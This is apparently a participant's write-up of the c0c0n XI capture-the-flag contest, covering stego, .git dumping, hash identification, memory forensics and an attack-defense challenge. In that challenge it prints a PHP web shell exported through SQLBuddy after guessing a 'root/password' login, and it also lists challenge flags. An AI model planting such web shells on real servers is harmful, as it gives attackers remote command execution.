c0c0n XI CTF Writeup

About c0c0n XI

c0c0n is an annual international cybersecurity, data privacy and hacking conference organised by the International public-private partnership led by the Society for the Policing of Cyberspace (POLCYB) in association with Information Security Research Association (ISRA), Group of Technology Companies ( GTec) and Kerala State IT Mission.

Capture the Flag

This time Capture the Flag competition was organized by AppFabs and Kerala Police Cyberdome .

Registration

The registration was quiet easy as the organizers noted down our names and contact details and gave us the rules and a hash that was needed to verify the registration in the CTF platform and a really cool Badge

Platform Interface

Each team consisted of 2 players and the platform provided challenges based on WEB,CRYPTO,FORENSICS,MISC.

The game started by 10am on 5/10/2018 and by that time around 35 teams registered for the game . Phew that's a hell lot of people as this was my 2nd CTF competition,

Challenges

In this we had a zip file with some content we extracted the file and found 3 image files,

By running strings a txt file was embedded in the files .Using binwalk we extracted the file and the flag was split in 3 and embedded in the images

domectf{VUOtDSJ1B7PW6XuEUu9Rfp9UFrN3G6VK} and there is the flag

This was a web challenge that pointed to a login page

While my teammate looked for issues in the LOGIN I ran a dirb on the url which returned something good

.git directory so we tried gitdumper to dump the content of the git directory

The first thing i did was to check the commit logs but the organizers made it difficult by making changes to the HEAD which returned an error though I tried to correct the errors I failed Hmmm what could be done and there is a tool called gitextractor which scans a git directory and extract files from commits

FLAG

This challenge offered a large string of data (Base64) which was encoded multiple times By decoding it we ended up with quiet unusual thing

$9$GQUjqAtOhSeTz6AtuhcvWLNYoHqfQF6Ctrv8Xbwq.PQnC1RSKWxtuyeWLdVPfTz9tyrv8X-tuKW8Lbw.mf56CRESreM5QlvL7bwQz3npORhyrvL7-PQF/OB

We checked with hashcat examples and it returned CISCO hash

well that wasn't the hash it was Juniper Hash

LOL this took some time

This challenge had a password protected pdf file whose password we had to find we tried pdfcrack and all sorts of tools from our arsenal yet no valid password and for a change we tried the CTF name (domectf) and everyone who solved it should have face palmed themselves

This challenge was quiet interesting as the challenge type says “base” all we have to do is to get a code execution and write the team name to /tmp/DOMECTF_BASE and guard it from other teams when done correctly the team gains 1 point every 5 minutes or so (correct me if I am wrong) + a base point of 200

Tried dirb and other tools nothing interesting time to fire up BURP SUITE and I ran the spider against it and it found a LOGIN to SQLBUDDY (its 2am @ night)

username was root and the password we had to guess and found the password ie password XD Valid LOGIN

Now we can execute code but we had some problem after hours of head banging we figured that the organizers blocked functions such as system the only thing that went pass was exec and shell_exec

We created a database and a table a inserted <?php echo shell_exec($_GET[‘e’].’ 2>&1'); ?> as the value and text as the datatype and now to get a shell all we needed to do was export it to a php file

CODE EXEC

And we wrote our team name to the DOMECTF_BASE file now we had to defend it so I wrote some crappy code that logs in automatically to SQLBUDDY and creates the database and does the rest of the stuff though my code failed in several areas it was sreehari’s skills that kept us guarding the base ,

This challenge was quiet frustrating as the link pointed to a 7z file which was around 300MB the problem was at the event there was so much network problems that it took me 3 attempts to complete the download

Extracting the file gave a file.raw from my experience in playing CTFs in hackthebox instantly knew it was a memory dump so we needed to extract the data from it so I used a tool called foremost which is a forensics tool

which dumped a HELL lot of data

Which searching in the extracted data there was a zip file that contained the flag which was password protected

In the previous screenshot its clear that the memory is from a windows machine now to find the password we tried fcrackzip with different wordlists but nothing gave us the password so I was sure that the password must be in the memory dump , as it was my first time using volatility

First we had to figure which version of Windows does the memory dump belongs to

That’s the password for the zip file

domectf{ILko4kCKG6Bo4qtTnm7gm4gR1QhmDWUN} by time we figured this the competition was over :( but we became 4th which is not bad at all competed with 50 teams and ending up 4th is not a small achievement.

These are the challenges that our team has solved there are more will try to complete the rest

Thanks to my team mate Sreehari for helping me in many ways and thanks to team AppFabs and congrats to RedX , RedRaptor and 0x00sec for securing the 1st 2nd and 3rd places,also I would like to thank NetObjex for sponsoring a ticket for the event and making my dream to be a reality